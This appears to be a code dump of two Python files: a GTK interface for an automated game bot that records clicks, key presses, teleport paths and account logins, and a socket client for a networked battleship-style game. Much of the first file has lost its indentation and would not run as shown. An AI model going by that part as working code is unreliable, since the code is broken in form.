self.enclos_type_combo = CustomComboBox(data.EnclosType, sort=True)
self.enclos_type_combo.set_margin_left(10)
widget.add(self.enclos_type_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Enclos(location=%s,type=%s)' % (self.enclos_location_combo.get_active_text(), self.enclos_type_combo.get_active_text())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Zaap
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/zaap.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Zaap')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# From
widget.add(Gtk.Label('<b>From</b>', xalign=0, use_markup=True))
self.zaap_from_combo = CustomComboBox(data.Zaap['From'], sort=True)
self.zaap_from_combo.set_margin_left(10)
self.zaap_from_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaap_to_combo)
)
widget.add(self.zaap_from_combo)
# To
widget.add(Gtk.Label('<b>To</b>', xalign=0, use_markup=True))
self.zaap_to_combo = CustomComboBox(data.Zaap['To'], sort=True)
self.zaap_to_combo.set_margin_left(10)
self.zaap_to_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaap_from_combo)
)
widget.add(self.zaap_to_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Zaap(from=%s,to=%s)' % (self.zaap_from_combo.get_active_text(), self.zaap_to_combo.get_active_text())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Zaapi
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/destination.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Zaapi')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# From
widget.add(Gtk.Label('<b>From</b>', xalign=0, use_markup=True))
self.zaapi_from_combo = CustomComboBox(data.Zaapi['From'], sort=True)
self.zaapi_from_combo.set_margin_left(10)
self.zaapi_from_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaapi_to_combo, use_contains=True)
)
widget.add(self.zaapi_from_combo)
# To
widget.add(Gtk.Label('<b>To</b>', xalign=0, use_markup=True))
self.zaapi_to_combo = CustomComboBox(data.Zaapi['To'], sort=True)
self.zaapi_to_combo.set_margin_left(10)
self.zaapi_to_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaapi_from_combo, use_contains=True)
)
widget.add(self.zaapi_to_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Zaapi(from=%s,to=%s)' % (self.zaapi_from_combo.get_active_text(), self.zaapi_to_combo.get_active_text())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Collect
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/miner.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Collect')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Map
widget.add(Gtk.Label('<b>Map</b>', xalign=0, use_markup=True))
self.collect_map_combo = CustomComboBox(maps.load(), sort=True)
self.collect_map_combo.set_margin_left(10)
widget.add(self.collect_map_combo)
# Store Path
widget.add(Gtk.Label('<b>Store Path</b>', xalign=0, use_markup=True))
# Combo
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
self.collect_sp_combo_radio = Gtk.RadioButton()
self.collect_sp_combo_radio.set_active(True)
hbox.add(self.collect_sp_combo_radio)
self.collect_sp_combo = CustomComboBox(data.BankPath, sort=True)
self.collect_sp_combo.connect('changed', lambda combo: self.collect_sp_combo_radio.set_active(True))
hbox.pack_start(self.collect_sp_combo, True, True, 0)
widget.add(hbox)
# FileChooserButton
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
self.collect_sp_filechooser_radio = Gtk.RadioButton(group=self.collect_sp_combo_radio)
hbox.add(self.collect_sp_filechooser_radio)
self.collect_sp_filechooserbutton = FileChooserButton(title='Choose store path', filter=('Store Path', '*.path'))
self.collect_sp_filechooserbutton.set_current_folder(tools.get_full_path('paths'))
self.collect_sp_filechooserbutton.connect('file-set', lambda filechooserbutton: self.collect_sp_filechooser_radio.set_active(True))
hbox.pack_start(self.collect_sp_filechooserbutton, True, True, 0)
widget.add(hbox)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Collect(map=%s,store_path=%s)' % (self.collect_map_combo.get_active_text(), self.collect_sp_combo.get_active_text() if self.collect_sp_combo_radio.get_active() else self.collect_sp_filechooserbutton.get_filename())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Click
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/arrow.png'), 24, 24)
#pixbuf = Gdk.Cursor(Gdk.CursorType.ARROW).get_image().scale_simple(24, 24, GdkPixbuf.InterpType.BILINEAR)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Click')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Twice
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Twice</b>', xalign=0, use_markup=True))
self.click_twice_switch = Gtk.Switch()
hbox.pack_end(self.click_twice_switch, False, False, 0)
widget.add(hbox)
# Location
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Location</b>', xalign=0, use_markup=True))
cursor_pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/crosshair.png'), 16, 16)
#cursor_pixbuf = Gdk.Cursor(Gdk.CursorType.CROSSHAIR).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
self.select_button = Gtk.Button()
self.select_button.set_size_request(40, -1)
self.select_button.set_tooltip_text('Select')
self.select_button.set_image(Gtk.Image(pixbuf=cursor_pixbuf))
self.select_button.connect('clicked', self.on_select_button_clicked)
hbox.pack_end(self.select_button, False, False, 0)
widget.add(hbox)
## Wait
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/hourglass.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Wait')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Pause Bot
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Pause Bot</b>', xalign=0, use_markup=True))
self.pause_bot_switch = Gtk.Switch()
self.pause_bot_switch.connect('notify::active', lambda switch, pspec: self.duration_box.set_sensitive(not switch.get_active()))
hbox.pack_end(self.pause_bot_switch, False, False, 0)
widget.add(hbox)
# Duration
self.duration_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
label = Gtk.Label('<b>Duration</b>', xalign=0, use_markup=True)
label.set_tooltip_text('(in seconds)')
self.duration_box.add(label)
self.duration_spin_button = SpinButton(min=1, max=60)
self.duration_box.pack_end(self.duration_spin_button, False, False, 0)
widget.add(self.duration_box)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Wait(duration=%d,pause=%s)' % (0 if self.pause_bot_switch.get_active() else self.duration_spin_button.get_value_as_int(), self.pause_bot_switch.get_active())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Keyboard
image = Gtk.Image(icon_name='input-keyboard', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
label = ImageLabel(image, 'Keyboard')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Press Key
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
self.press_key_radio = Gtk.RadioButton()
self.press_key_radio.add(Gtk.Label('<b>Press Key</b>', xalign=0, use_markup=True))
hbox.add(self.press_key_radio)
self.key_label = Gtk.Label()
hbox.add(self.key_label)
widget.add(hbox)
self.keys_combo = CustomComboBox(data.KeyboardShortcuts, sort=True)
self.keys_combo.set_margin_left(10)
self.keys_combo.connect('changed', lambda combo: (
self.key_label.set_text('(' + data.KeyboardShortcuts[combo.get_active_text()] + ')'),
self.press_key_radio.set_active(True)
)
)
widget.add(self.keys_combo)
# Type Text
self.type_text_radio = Gtk.RadioButton(group=self.press_key_radio)
self.type_text_radio.add(Gtk.Label('<b>Type Text</b>', xalign=0, use_markup=True))
widget.add(self.type_text_radio)
self.type_text_entry = Gtk.Entry(placeholder_text='Text')
self.type_text_entry.set_margin_left(10)
self.type_text_entry.set_width_chars(10)
self.type_text_entry.connect('focus-in-event', lambda entry, event: self.type_text_radio.set_active(True))
widget.add(self.type_text_entry)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', self.on_keyboard_add_button_clicked)
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Connect
image = Gtk.Image(icon_name='network-wired', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
label = ImageLabel(image, 'Connect')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Account
widget.add(Gtk.Label('<b>Account</b>', xalign=0, use_markup=True))
self.connect_accounts_combo = TextValueComboBox(accounts_list, model=Gtk.ListStore(str, int), text_key='login', value_key='id', sort_key='position')
self.connect_accounts_combo.set_margin_left(10)
widget.add(self.connect_accounts_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Connect(account_id=%s)' % self.connect_accounts_combo.get_active_value()))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Disconnect
image = Gtk.Image(icon_name='network-idle', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
label = ImageLabel(image, 'Disconnect')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Exit Game
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
widget.add(hbox)
hbox.add(Gtk.Label('<b>Exit Game</b>', xalign=0, use_markup=True))
self.exit_game_switch = Gtk.Switch()
hbox.pack_end(self.exit_game_switch, False, False, 0)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Disconnect(%s)' % self.exit_game_switch.get_active()))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Separator
path_page.add(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL, margin=5))
## Listbox
self.path_listbox = CustomListBox()
path_page.pack_end(self.path_listbox, True, True, 0)
# Load
load_path_button = Gtk.Button()
load_path_button.set_tooltip_text('Load')
load_path_button.set_image(Gtk.Image(icon_name='document-open'))
load_path_button.connect('clicked', self.on_load_path_button_clicked)
self.path_listbox.add_button(load_path_button)
# Save
self.save_path_button = Gtk.Button()
self.save_path_button.set_tooltip_text('Save')
self.save_path_button.set_sensitive(False)
self.save_path_button.set_image(Gtk.Image(icon_name='document-save-as'))
self.save_path_button.connect('clicked', self.on_save_path_button_clicked)
self.path_listbox.add_button(self.save_path_button)
self.path_listbox.on_add(self.on_path_listbox_add)
self.path_listbox.on_delete(self.on_path_listbox_delete)
### Map Tab
map_page = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
map_page.set_border_width(10)
bot_notebook.append_page(map_page, Gtk.Label('Map'))
## View
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>View</b>', xalign=0, use_markup=True))
map_page.add(hbox)
# Options
menu_image = MenuImage()
hbox.add(menu_image)
options_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
menu_image.set_widget(options_box)
# Use data colors
use_data_colors_check = Gtk.CheckButton('Use data colors')
use_data_colors_check.connect('clicked', lambda button: self.map_view.set_use_origin_colors(button.get_active()))
options_box.add(use_data_colors_check)
# Add borders
add_borders_check = Gtk.CheckButton('Add borders')
add_borders_check.connect('clicked', lambda button: self.map_view.set_add_borders(button.get_active()))
options_box.add(add_borders_check)
# Map View
self.map_view = MiniMap()
map_page.pack_start(self.map_view, True, True, 0)
## Data
map_page.add(Gtk.Label('<b>Data</b>', xalign=0, use_markup=True))
self.map_data_listbox = CustomListBox(allow_moving=False)
map_page.pack_start(self.map_data_listbox, True, True, 0)
# Select
self.select_resource_button = Gtk.Button()
self.select_resource_button.set_tooltip_text('Select resource')
self.select_resource_button.set_image(Gtk.Image(pixbuf=cursor_pixbuf))
self.select_resource_button.connect('clicked', self.on_select_resource_button_clicked)
self.map_data_listbox.add_button(self.select_resource_button)
# Edit
edit_map_button = MenuButton(icon_name='document-edit-symbolic')
edit_map_button.set_tooltip_text('Edit')
self.map_data_listbox.add_button(edit_map_button)
button_box = ButtonBox(linked=True)
edit_map_button.add(button_box)
# Load
load_map_button = Gtk.Button()
load_map_button.set_tooltip_text('Load')
load_map_button.set_image(Gtk.Image(icon_name='document-open'))
load_map_button.connect('clicked', self.on_load_map_button_clicked)
button_box.add(load_map_button)
# Delete
delete_map_button = Gtk.Button()
delete_map_button.set_tooltip_text('Delete')
delete_map_button.set_image(Gtk.Image(icon_name='edit-delete'))
delete_map_button.connect('clicked', self.on_delete_map_button_clicked)
button_box.add(delete_map_button)
# Save
self.save_map_button = Gtk.Button()
self.save_map_button.set_tooltip_text('Save')
self.save_map_button.set_sensitive(False)
self.save_map_button.set_image(Gtk.Image(icon_name='document-save-as'))
self.save_map_button.connect('clicked', self.on_save_map_button_clicked)
self.map_data_listbox.add_button(self.save_map_button)
self.map_data_listbox.on_add(self.on_map_data_listbox_add)
self.map_data_listbox.on_delete(self.on_map_data_listbox_delete)
def on_load_map_button_clicked(self, button):
dialog = LoadMapDialog(self)
dialog.run()
def on_delete_map_button_clicked(self, button):
dialog = DeleteMapDialog(self)
dialog.run()
def on_save_map_button_clicked(self, button):
dialog = SaveMapDialog(self)
dialog.run()
def add_map_data(self, location):
# append to listbox
text = '{"x": %d, "y": %d, "width": %d, "height": %d, "color": "%s"}' % location
self.map_data_listbox.append_text(text)
# append to view
point = maps.to_array(text)
self.map_view.add_point(point, 'Resource', MiniMap.point_colors['Resource'])
self.select_resource_button.set_sensitive(True)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def on_select_resource_button_clicked(self, button):
button.set_sensitive(False)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.CROSSHAIR))
game_location = tools.get_widget_location(self.game_area)
Thread(target=self.wait_for_click, args=(self.add_map_data, game_location)).start()
def on_map_data_listbox_add(self):
if not self.save_map_button.get_sensitive():
self.save_map_button.set_sensitive(True)
def on_map_data_listbox_delete(self, row_index):
self.map_view.remove_point(row_index)
if self.map_data_listbox.is_empty():
self.save_map_button.set_sensitive(False)
def on_path_listbox_add(self):
if not self.save_path_button.get_sensitive():
self.save_path_button.set_sensitive(True)
def on_path_listbox_delete(self, row_index):
if self.path_listbox.is_empty():
self.save_path_button.set_sensitive(False)
def on_load_path_button_clicked(self, button):
dialog = OpenFileDialog('Load Path', self, ('Bot Path', '*.path'))
dialog.set_current_folder(tools.get_full_path('paths'))
response = dialog.run()
if response == Gtk.ResponseType.OK:
# read file
path = tools.read_file(dialog.get_filename())
# append to path listbox
for line in path.splitlines():
self.path_listbox.append_text(line)
dialog.destroy()
def on_save_path_button_clicked(self, button):
dialog = SaveFileDialog('Save as', self, ('Bot Path', '*.path'))
dialog.set_current_folder(tools.get_full_path('paths'))
dialog.set_current_name('path_' + tools.get_date_time() + '.path')
response = dialog.run()
if response == Gtk.ResponseType.OK:
# get all rows text
text = ''
for row in self.path_listbox.get_rows():
text += self.path_listbox.get_row_text(row) + '\n'
# save it to file
tools.save_text_to_file(text, dialog.get_filename())
dialog.destroy()
def on_keyboard_add_button_clicked(self, button):
if self.press_key_radio.get_active():
selected = self.keys_combo.get_active_text()
self.path_listbox.append_text('PressKey(%s)' % parser.parse_data(data.KeyboardShortcuts, selected))
else:
self.path_listbox.append_text('TypeText(%s)' % self.type_text_entry.get_text())
def wait_for_click(self, callback, game_location=None):
# wait for click
tools.wait_for_mouse_event('left_down')
# get mouse position & screen size
x, y = tools.get_mouse_position()
width, height = tools.get_screen_size()
# get pixel color
color = tools.get_pixel_color(x, y)
# adjust location to game window
if game_location is not None:
# get game area location
game_x, game_y, game_width, game_height = game_location
#print('x: %d, y: %d, game_x: %d, game_y: %d, game_width: %d, game_height: %d' % (x, y, game_x, game_y, game_width, game_height))
# scale to game area
if tools.position_is_inside_bounds(x, y, game_x, game_y, game_width, game_height):
# position is inside game area, so we fit x & y to it
x = x - game_x
y = y - game_y
width = game_width
height = game_height
# execute callback
GObject.idle_add(callback, (x, y, width, height, color))
def add_click(self, location):
x, y, width, height, color = location
twice = self.click_twice_switch.get_active()
self.path_listbox.append_text('Click(x=%d,y=%d,width=%d,height=%d,twice=%s)' % (x, y, width, height, twice))
self.select_button.set_sensitive(True)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def set_cursor(self, cursor):
window = self.get_window() # Gdk.get_default_root_window()
window.set_cursor(cursor)
def on_select_button_clicked(self, button):
button.set_sensitive(False)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.CROSSHAIR))
game_location = tools.get_widget_location(self.game_area)
Thread(target=self.wait_for_click, args=(self.add_click, game_location)).start()
def on_start_button_clicked(self, button):
if self.game_window is None:
AlertDialog(self, 'Please select a game window')
elif not self.bot_path:
AlertDialog(self, 'Please select a bot path')
else:
# get game location
game_location = tools.get_widget_location(self.game_area)
# start bot thread
if self.bot_thread is None or not self.bot_thread.isAlive():
# get thread parameters
start_from_step = self.step_spin_button.get_value_as_int()
repeat_path = self.repeat_spin_button.get_value_as_int() if self.repeat_switch.get_active() else 1
if self.connect_to_account_switch.get_active():
account_id = self.accounts_combo.get_active_value()
disconnect_after = self.disconnect_after_switch.get_active()
else:
account_id = None
disconnect_after = False
# run thread
self.bot_thread = BotThread(self, game_location, start_from_step, repeat_path, account_id, disconnect_after)
self.bot_thread.start()
self.settings_button.set_sensitive(False)
self.bot_widgets.set_sensitive(False)
# resume bot thread if paused
else:
self.bot_thread.resume(game_location)
# enable/disable buttons
self.start_button.set_image(Gtk.Image(file=tools.get_full_path('icons/loader.gif')))
self.start_button.set_sensitive(False)
self.pause_button.set_sensitive(True)
self.stop_button.set_sensitive(True)
def set_internet_state(self, state):
if state:
self.start_button.set_image(Gtk.Image(file=tools.get_full_path('icons/loader.gif')))
else:
self.log(tools.print_internet_state(state), LogType.Error)
self.start_button.set_image(Gtk.Image(icon_name='network-error'))
def set_buttons_to_paused(self):
self.start_button.set_tooltip_text('Resume')
self.start_button.set_image(Gtk.Image(icon_name='media-skip-forward'))
self.start_button.set_sensitive(True)
self.pause_button.set_sensitive(False)
def pause_bot(self):
if self.bot_thread and self.bot_thread.isAlive() and self.bot_thread.pause_event.isSet():
self.bot_thread.pause()
self.set_buttons_to_paused()
	def on_pause_button_clicked(self, button):
		# toolbar pause button → delegate to pause_bot()
		self.pause_bot()
def reset_buttons(self):
self.start_button.set_tooltip_text('Start')
self.start_button.set_image(Gtk.Image(icon_name='media-playback-start'))
self.start_button.set_sensitive(True)
self.stop_button.set_sensitive(False)
self.pause_button.set_sensitive(False)
self.settings_button.set_sensitive(True)
self.bot_widgets.set_sensitive(True)
def on_stop_button_clicked(self, button):
if self.bot_thread and self.bot_thread.isAlive():
self.bot_thread.stop()
self.reset_buttons()
	def on_bot_path_changed(self, filechooserbutton):
		# remember the bot path file the user selected
		self.bot_path = filechooserbutton.get_filename()
def populate_game_window_combo(self):
self.game_window_combo_ignore_change = True
self.game_window_combo.remove_all()
self.game_windowList = tools.get_game_window_list()
self.debug('Populate game window combobox, %d window found' % len(self.game_windowList), DebugLevel.High)
for window_name in self.game_windowList:
self.game_window_combo.append_text(window_name)
self.game_window_combo_ignore_change = False
	def focus_game(self):
		# give keyboard focus back to the embedded game area (if plugged)
		if self.game_area:
			#self.debug('Focus game', DebugLevel.High)
			# set keyboard focus
			self.game_area.child_focus(Gtk.DirectionType.TAB_BACKWARD)
	def on_plug_added(self, widget):
		# Gtk.Socket callback: the game window has been embedded
		self.debug('Game window plugged')
	def on_plug_removed(self, widget):
		"""Gtk.Socket callback: the game window was unplugged.

		Returning True keeps the socket widget alive for reuse; returning
		None (falsy) lets GTK destroy it, so game_area is reset as well.
		"""
		self.debug('Game window unplugged')
		# enable/disable widgets
		self.unplug_button.hide()
		self.refresh_button.show()
		if '--dev' in self.args:
			self.plug_button.show()
		self.game_window_combo.set_sensitive(True)
		self.populate_game_window_combo()
		self.take_screenshot_button.set_sensitive(False)
		# if game window have been destroyed/closed
		game_window_destroyed = self.game_window and self.game_window.is_destroyed()
		if game_window_destroyed:
			self.game_window = None
		# keep the socket only when configured to and the window still exists
		if self.settings['Game']['KeepOpen'] and not game_window_destroyed:
			return True
		else:
			self.game_area = None
	def plug_game_window(self, window_xid):
		"""Embed the game window identified by window_xid into a Gtk.Socket.

		The socket is created lazily on first use; surrounding widgets are
		switched to their "plugged" state on success.
		"""
		self.game_window = tools.get_game_window(window_xid)
		if self.game_window:
			# create socket if not exist
			if self.game_area is None:
				self.game_area = Gtk.Socket()
				#self.game_area.set_can_focus(True)
				self.game_area.connect('plug-added', self.on_plug_added)
				self.game_area.connect('plug-removed', self.on_plug_removed)
				self.game_area.show_all()
				self.vtable.attach(self.game_area, 0, 1, 0, 3)
			# plug game window
			self.debug('Plug game window (id: %d)' % window_xid, DebugLevel.Low)
			self.game_area.add_id(window_xid)
			#self.game_window.reparent(self.game_area.get_window(), 0, 0)
			#self.game_window.show() # force show (when minimized)
			# enable/disable widgets
			self.refresh_button.hide()
			if '--dev' in self.args:
				self.plug_button.hide()
			self.unplug_button.show()
			self.game_window_combo.set_sensitive(False)
			self.take_screenshot_button.set_sensitive(True)
def on_game_window_combo_changed(self, combo):
if self.game_windowList and not self.game_window_combo_ignore_change:
# get selected game window
selected = combo.get_active_text()
window_xid = self.game_windowList[selected]
# plug it
self.plug_game_window(window_xid)
def unplug_game_window(self):
if self.game_window and not self.game_window.is_destroyed():
self.debug('Keep game window open')
root = Gdk.get_default_root_window()
self.game_window.reparent(root, 0, 0)
self.game_window = None
def on_unplug_button_clicked(self, button):
self.debug('Unplug game window')
if self.settings['Game']['KeepOpen']:
self.unplug_game_window()
else:
self.game_window.destroy()
def on_plug_button_clicked(self, button):
dialog = PlugDialog(self)
dialog.run()
	def on_refresh_button_clicked(self, button):
		# re-scan for open game windows
		self.populate_game_window_combo()
# Override the default handler for the delete-event signal
def do_delete_event(self, event):
# Show our message dialog
dialog = Gtk.MessageDialog(text='Are you sure you want to quit?', transient_for=self, buttons=Gtk.ButtonsType.OK_CANCEL, message_type=Gtk.MessageType.QUESTION)
response = dialog.run()
dialog.destroy()
# We only terminate when the user presses the OK button
if response == Gtk.ResponseType.OK:
# keep game window
if self.settings['Game']['KeepOpen']:
self.unplug_game_window()
# stop bot thread
if self.bot_thread and self.bot_thread.isAlive():
self.bot_thread.stop()
return False
# Otherwise we keep the application open
return True
	def main(self):
		# enter the GTK main loop (blocks until Gtk.main_quit is called)
		Gtk.main()
|
serverhandler.py
|
import logging, socket, sys
from threading import Thread
from messageparser import *
from playingfield import Orientation
# Maps numeric server report status codes to human-readable names;
# used for logging and validation in ServerHandler.__receiveLoop.
reportCodes = {
	11: "Begin_Turn",
	13: "Update_Own_Field",
	14: "Update_Enemy_Field",
	15: "Chat_Broadcast",
	16: "Update_Lobby",
	17: "Game_Ended",
	18: "Begin_Ship_Placing",
	19: "Game_Aborted",
	21: "Successful_Move",
	22: "Successful_Attack",
	23: "Surrender_Accepted",
	24: "Successful_Special_Attack",
	27: "Successful_Game_Join",
	28: "Successful_Game_Create",
	29: "Successful_Ship_Placement",
	31: "Illegal_Move",
	32: "Illegal_Special_Attack",
	37: "Illegal_Game_Definition",
	38: "Illegal_Ship_Placement",
	39: "Illegal_Attack",
	40: "Message_Not_Recognized",
	41: "Not_Your_Turn",
	43: "Not_In_Any_Game",
	47: "Game_Join_Denied",
	48: "Game_Preparation_Ended"
}

# Wire encoding of ship/move orientations used in outgoing messages.
orientationCodes = {
	Orientation.NORTH: "N",
	Orientation.WEST: "W",
	Orientation.SOUTH: "S",
	Orientation.EAST: "E"
}
class ServerHandler:
	"""
	Communicates with the server over a TCP socket.

	Messages are encoded/decoded by MessageParser; each incoming report is
	prefixed with a two-byte big-endian payload length. Decoded reports are
	dispatched to the backend from a background receive thread.

	Author:
		Maximilian Hess <mail@maximilianhess.com>
	"""

	def setNickname(self, nickname):
		"""
		Resets the nickname.

		Args:
			nickname: the new nickname
		"""
		self.__sendMessage("nickname_set", {"name": nickname})

	def __onUpdateLobby(self, params):
		"""
		Handles an Update_Lobby report, sent whenever the server noticed a
		change in the lobby.

		Expected parameters:
			number_of_clients:[number n]; total clients connected
			number_of_games:[number m]; total open games
			game_name_k / game_players_count_k (1|2) / game_player_k_i
				for each game k in 0..m-1 (players mapped by identifier)
			player_name_j (MAY be empty) / player_identifier_j
				(per-server-unique) for each player j in 0..n-1

		Args:
			params: the decoded report parameters
		"""
		from backend import GameInformation, PlayerInformation

		games = []
		players = []

		# extract players count and games count
		playersTotal = int(params["number_of_clients"])
		gamesTotal = int(params["number_of_games"])

		# Players are extracted before the games so that every player a game
		# references is guaranteed to exist.
		playersCounter = 0
		for param, value in params.items():
			if param.startswith("player_identifier_"):
				# ignore any players beyond the announced total
				if playersCounter >= playersTotal:
					continue
				playersCounter += 1

				# extract the nickname if there is one
				suffix = param[18:]
				if "player_name_" + suffix in params:
					players.append(PlayerInformation(value, params["player_name_" + suffix]))

		# extract games
		gamesCounter = 0
		for param, value in params.items():
			if param.startswith("game_name_"):
				# ignore any games beyond the announced total
				if gamesCounter >= gamesTotal:
					continue
				gamesCounter += 1

				counter = int(param[10:])
				numberOfPlayers = int(params["game_players_count_" + str(counter)])
				if numberOfPlayers > 2:
					logging.error("Update_Lobby error: Too many players.")

				# find the players of this game (players were validated above)
				player0 = params["game_player_" + str(counter) + "_0"]
				game = GameInformation(value, player0)
				if numberOfPlayers > 1:
					game.players.append(params["game_player_" + str(counter) + "_1"])
				games.append(game)

		self.__backend.onLobbyUpdates(players, games)

	def joinGame(self, gameId):
		"""
		Sends a joinGame request to the server.

		Args:
			gameId: the identifier of the game
		"""
		self.__sendMessage("game_join", {"name": gameId})

	def createGame(self, gameId):
		"""
		Sends a new createGame request to the server.

		Args:
			gameId: the identifier of the new game
		"""
		self.__sendMessage("game_create", {"name": gameId})

	def leaveGame(self):
		"""
		Sends a leaveGame request to the server.
		"""
		self.__sendMessage("game_abort", {})

	def boardInit(self, ships):
		"""
		Sends the playing field to the server.

		Args:
			ships: a list of all ships
		"""
		params = {}
		for i, ship in enumerate(ships):
			params["ship_" + str(i) + "_x"] = str(ship.rear.x)
			params["ship_" + str(i) + "_y"] = str(ship.rear.y)
			params["ship_" + str(i) + "_direction"] = orientationCodes[ship.orientation]
		self.__sendMessage("board_init", params)

	def attack(self, target):
		"""
		Sends an attack message.

		Args:
			target: the address of the field that is to be attacked
		"""
		self.__sendMessage("attack", {"coordinate_x": target.x, "coordinate_y": target.y})

	def specialAttack(self, target):
		"""
		Special-attacks the given field.

		Args:
			target: the address of the bottom-left field
		"""
		self.__sendMessage("special_attack", {"coordinate_x": target.x, "coordinate_y": target.y})

	def move(self, shipId, direction):
		"""
		Moves a ship on the own playing field.

		Args:
			shipId: the id of the ship
			direction: the direction
		"""
		self.__sendMessage("move", {"ship_id": shipId, "direction": orientationCodes[direction]})

	def sendChatMessage(self, msg):
		"""
		Sends a chat message.

		Args:
			msg: the message
		"""
		self.__sendMessage("chat_send", {"text": msg})

	def capitulate(self):
		"""
		The player capitulates.
		"""
		self.__sendMessage("surrender", {})

	def __receiveLoop(self):
		"""
		Receives and dispatches server reports until close()/disconnect().

		Runs on a background thread started by connect().
		"""
		while not self.__stopReceiveLoop:
			try:
				# the first two bytes carry the payload size (big-endian)
				size = self.__sock.recv(2)
				if not size or len(size) < 2:
					continue

				# NOTE: msg is pre-bound so the error log below can never hit
				# an unbound local if recv()/decode() fails.
				msg = None
				try:
					msg = self.__sock.recv(size[0] * 256 + size[1]).decode()
				except Exception:
					logging.error("Failed to receive/decode report: %s" % msg)
					continue

				messageType, params = self.__messageParser.decode(msg)
				#logging.debug("Receive: {}".format(msg))

				# validate that the status code exists
				# (int comparisons use ==; "is" only works by accident via
				# CPython's small-integer cache)
				status = int(params["status"])
				if status in reportCodes:
					logging.debug("%s received: %s" % (messageType, reportCodes[status]))
					if status == 15:  # Chat_Broadcast
						self.__backend.onIncomingChatMessage(params["author_id"], params["timestamp"], params["message_content"])
					elif status == 16:  # Update_Lobby
						self.__onUpdateLobby(params)
					elif status == 17:  # Game_Ended
						self.__backend.onGameEnded(params)
					# game creation stuff
					elif status == 19:  # Game_Aborted
						self.__backend.onGameAborted()
					elif status == 23:  # Surrender_Accepted
						self.__backend.onCapitulate()
					elif status == 27 or status == 47:  # Successful_Game_Join or Game_Join_Denied
						self.__backend.onJoinGame(status == 27)
					elif status == 28:  # Successful_Game_Create
						self.__backend.onCreateGame(True)
